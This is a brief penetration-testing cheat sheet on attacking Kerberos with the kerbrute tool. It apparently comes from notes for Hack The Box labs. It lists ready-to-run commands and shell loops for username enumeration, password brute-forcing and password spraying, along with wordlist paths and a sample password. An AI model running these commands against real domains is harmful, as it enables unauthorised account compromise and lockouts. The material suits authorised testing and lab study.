KERBEROS - 88, 464
kerbrute
Bruteforce Kerberos - https://github.com/ropnop/kerbrute
Capabilities
# Brute force valid usernames
./kerbrute userenum -d $DOMAIN --dc $IP users.txt -v
# Brute force passwords for a given user
./kerbrute bruteuser -d analysis.htb --dc $IP /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt jdoe
while IFS= read -r user; do ./kerbrute bruteuser -d $DOMAIN --dc $IP /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt $user; done < users.txt
# Password spray for a given user list
./kerbrute passwordspray -d $DOMAIN --dc $IP users.txt 'Darkness1099!'
while IFS= read -r password; do ./kerbrute passwordspray -d $DOMAIN --dc $IP users.txt $password; done < passwords.txt
kali@kali ~/kerbrute (master)> ./kerbrute_linux_386 userenum -d office.htb --dc 10.10.11.3 /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
Wordlists
#Usernames
/opt/SecLists/Usernames/
/opt/SecLists/Usernames/xato-net-10-million-usernames.txt
Last updated